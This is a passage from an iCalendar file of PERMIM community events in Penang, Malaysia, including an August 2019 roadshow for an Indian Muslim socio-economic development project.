SUMMARY:Perjuanita - Sayangi Malaysiaku
DESCRIPTION:
URL:https://permim.org/event/perjuanita-sayangi-malaysiaku/
LOCATION:Dewan Sri Pinang\, Padang Kota Lama\, Pulau Pinang\, Pulau Pinang\, Malaysia
CATEGORIES:PERMIM Events
END:VEVENT
BEGIN:VEVENT
DTSTART;TZID=UTC:20190824T200000
DTEND;TZID=UTC:20190824T223000
DTSTAMP:20260420T054810
CREATED:20190815T201829Z
LAST-MODIFIED:20190815T201829Z
UID:4246-1566676800-1566685800@permim.org
SUMMARY:Indian Muslim - Socio Economic Development Project - Roadshow
DESCRIPTION:
URL:https://permim.org/event/indian-muslim-socio-economic-development-project-roadshow/
LOCATION:Dewan MJMC\, Penang\, Penang\, Malaysia
CATEGORIES:PERMIM Events
END:VEVENT
END:VCALENDAR